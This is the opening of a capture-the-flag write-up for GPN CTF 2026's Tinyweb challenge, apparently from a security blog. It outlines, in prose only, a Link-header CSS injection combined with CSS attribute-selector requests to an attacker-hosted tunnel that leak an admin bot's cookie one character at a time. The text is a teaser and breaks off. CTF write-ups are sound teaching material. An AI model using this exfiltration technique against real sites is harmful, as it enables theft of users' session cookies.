![GPN CTF 2026 Tinyweb writeup — Link header CSS injection plus body[onload^=...] attribute selectors leak the cookie character-by-character](https://cybersecurityelite.com/images/articles/gpn-ctf-2026-tinyweb.webp)
GPN CTF 2026 — Tinyweb: Link Header CSS Injection + Attribute Selector Exfil
Platform GPN CTF 2026 (kitctf) Difficulty Medium OS Web — Node http, Link header injection, CSS attribute-selector exfil Tags recognising unescape as a percent-decoder that mangles header values, splitting on Link header's comma+semicolon structural separators, injecting a second link entry with rel=stylesheet, hosting the CSS on a serveo-style tunnel that doesn't show an interstitial, iterating body[onload^=prefix] one character at a time Tinyweb is GPN CTF 2026’s pure-web challenge — 481 bytes of one-line Node http server with two reflection points and one admin bot that visits attacker-supplied URLs with the flag in a cookie. The intended path turns out to be an XS-Leaks-style CSS attribute-selector exfiltration: inject rel=stylesheet into the Link header via unescape percent-decoding, host CSS that uses body[onload^="prefix"] selectors to fire background: url(...) requests, iterate one character at a time. ~45 iterations of ~35 seconds each recover: ...